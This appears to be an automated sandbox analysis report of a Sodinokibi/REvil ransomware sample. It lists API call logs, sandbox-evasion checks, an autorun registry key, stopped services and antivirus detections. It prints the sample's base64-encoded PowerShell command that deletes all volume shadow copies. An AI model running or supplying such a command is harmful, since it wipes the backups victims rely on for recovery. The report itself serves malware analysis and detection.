process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad0000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad0000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad1000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad1000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad1000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad1000
success 0 0
1619867257.926398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ace000
success 0 0
1619867258.114398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00022000
success 0 0
1619867258.145398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
base_address: 0x000007fffff00000
success 0 0
1619867258.145398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007fffff00000
success 0 0
1619867258.145398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007fffff00000
success 0 0
1619867258.161398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
base_address: 0x000007ffffef0000
success 0 0
1619867258.161398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ffffef0000
success 0 0
1619867258.161398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000da000
success 0 0
1619867258.176398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00012000
success 0 0
1619867258.239398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000002cb2000
success 0 0
1619867258.270398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000002cb4000
success 0 0
1619867258.395398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000ea000
success 0 0
1619867258.864398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00023000
success 0 0
1619867258.864398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00024000
success 0 0
1619867259.223398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00112000
success 0 0
1619867259.223398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000ed000
success 0 0
1619867259.395398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000db000
success 0 0
1619867259.676398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000d2000
success 0 0
1619867259.739398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00025000
success 0 0
1619867259.770398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00160000
success 0 0
1619867259.989398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00013000
success 0 0
1619867260.473398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00026000
success 0 0
1619867261.145398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00113000
success 0 0
1619867262.817398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000dc000
success 0 0
1619867262.817398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff000d3000
success 0 0
1619867263.551398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff0001a000
success 0 0
1619867263.583398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x000007ff00161000
success 0 0
1619867263.629398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000002cb7000
success 0 0
Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 个事件)
Time & API Arguments Status Return Repeated
1619861118.590698
GetDiskFreeSpaceExW
root_path: C:\
free_bytes_available: 19614797824
total_number_of_free_bytes: 19614797824
total_number_of_bytes: 34252779520
success 1 0
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (1 个事件)
cmdline powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
Executes one or more WMI queries (1 个事件)
wmi select * from Win32_Shadowcopy
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619861118.700698
CreateProcessInternalW
thread_identifier: 580
thread_handle: 0x0000019c
process_identifier: 2364
current_directory:
filepath:
track: 1
command_line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x000001a0
inherit_handles: 0
success 1 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 个事件)
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.002810513449035 section {'size_of_data': '0x00004600', 'virtual_address': '0x0000f000', 'entropy': 7.002810513449035, 'name': '.rdata', 'virtual_size': '0x00004560'} description A section with a high entropy has been found
entropy 7.424874220673218 section {'size_of_data': '0x00001e00', 'virtual_address': '0x00014000', 'entropy': 7.424874220673218, 'name': '.data', 'virtual_size': '0x00002018'} description A section with a high entropy has been found
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1619867259.442398
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Terminates another process (2 个事件)
Time & API Arguments Status Return Repeated
1619861176.153698
NtTerminateProcess
status_code: 0x00000000
process_identifier: 2132
process_handle: 0x0000025c
failed 0 0
1619861176.153698
NtTerminateProcess
status_code: 0x00000000
process_identifier: 2132
process_handle: 0x0000025c
success 0 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Attempts to stop active services (2 个事件)
Time & API Arguments Status Return Repeated
1619861118.637698
ControlService
service_handle: 0x005e8a08
service_name: aelookupsvc
control_code: 1
success 1 0
1619861118.669698
ControlService
service_handle: 0x00624628
service_name: cryptsvc
control_code: 1
success 1 0
Installs itself for autorun at Windows startup (1 个事件)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\BV7BRrErOX reg_value C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\b5d3505a5533c63d9e12b4ee1487febb.exe
Attempts to detect Cuckoo Sandbox through the presence of a file (2 个事件)
file c:\Python27\agent.pyw
file c:\tmpsij43m\analyzer.py
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 172.217.160.78:443
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan DeepScan:Generic.Ransom.Sodinokibi.96BC65A9
FireEye Generic.mg.b5d3505a5533c63d
McAfee GenericRXLR-KR!B5D3505A5533
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
AegisLab Trojan.Win32.Sodin.trwv
Sangfor Malware
K7AntiVirus Trojan ( 0054d99c1 )
BitDefender DeepScan:Generic.Ransom.Sodinokibi.96BC65A9
K7GW Trojan ( 0054d99c1 )
Cybereason malicious.a5533c
Cyren W32/Kryptik.AKW.gen!Eldorado
Symantec Trojan Horse
APEX Malicious
Paloalto generic.ml
ClamAV Win.Ransomware.Sodinokibi-7013612-0
Kaspersky Trojan-Ransom.Win32.Sodin.zv
Alibaba Ransom:Win32/Sodinokibi.d670ed7e
NANO-Antivirus Trojan.Win32.Encoder.hlptua
Rising Ransom.Sodinokibi!1.CA3E (CLASSIC)
Ad-Aware DeepScan:Generic.Ransom.Sodinokibi.96BC65A9
Emsisoft DeepScan:Generic.Ransom.Sodinokibi.96BC65A9 (B)
Comodo Malware@#1dsbhhc0ofr9c
F-Secure Trojan.TR/AD.SodinoRansom.xxwrs
DrWeb Trojan.Encoder.28004
Zillya Trojan.Sodin.Win32.11
TrendMicro Ransom.Win32.SODINOKIB.SMTH
McAfee-GW-Edition BehavesLike.Win32.Generic.ch
Sophos Mal/Generic-R + Troj/Sodino-BU
Ikarus Trojan-Ransom.Sodinokibi
GData DeepScan:Generic.Ransom.Sodinokibi.96BC65A9
Jiangmin Trojan.Sodin.x
Avira TR/AD.SodinoRansom.xxwrs
MAX malware (ai score=100)
Antiy-AVL Trojan[Ransom]/Win32.Sodin
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Ransom.Win32.Ransom.oa!s1
Arcabit DeepScan:Generic.Ransom.Sodinokibi.96BC65A9
ZoneAlarm Trojan-Ransom.Win32.Sodin.zv
Microsoft Ransom:Win32/Revil.SI!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.Ransom.C4107340
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.34700.iuW@aO@b7yc
ALYac Trojan.Ransom.Sodinokibi
TACHYON Ransom/W32.Sodinokibi.137216
VBA32 BScope.Trojan.DelShad
Malwarebytes Ransom.Sodinokibi
Panda Trj/Genetic.gen
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-05-08 23:47:50

Imports

Library KERNEL32.dll:
0x40f008 lstrlenW
0x40f00c SetErrorMode
0x40f010 GetStdHandle
0x40f014 CreateFileW
0x40f018 WriteFile
0x40f01c OutputDebugStringW
0x40f028 HeapAlloc
0x40f02c HeapFree
0x40f030 GetProcessHeap
0x40f03c ExitProcess
0x40f040 GetCurrentThread
0x40f044 GetProcAddress
0x40f04c LoadLibraryA
0x40f058 WriteConsoleW
0x40f05c CloseHandle
0x40f060 GetExitCodeProcess
0x40f064 GetCurrentThreadId

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49192 113.108.239.130 r1---sn-j5o76n7e.gvt1.com 80
192.168.56.101 49189 203.208.40.34 update.googleapis.com 443
192.168.56.101 49190 203.208.41.33 redirector.gvt1.com 80
192.168.56.101 49193 58.63.233.69 r4---sn-j5o76n7l.gvt1.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57874 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 62912 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com

http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=0-7178
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r4---sn-j5o76n7l.gvt1.com

http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=7179-20789
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r4---sn-j5o76n7l.gvt1.com

http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r4---sn-j5o76n7l.gvt1.com

http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619838257&mv=m&mvi=1&pl=23&shardbypass=yes
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619838257&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o76n7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.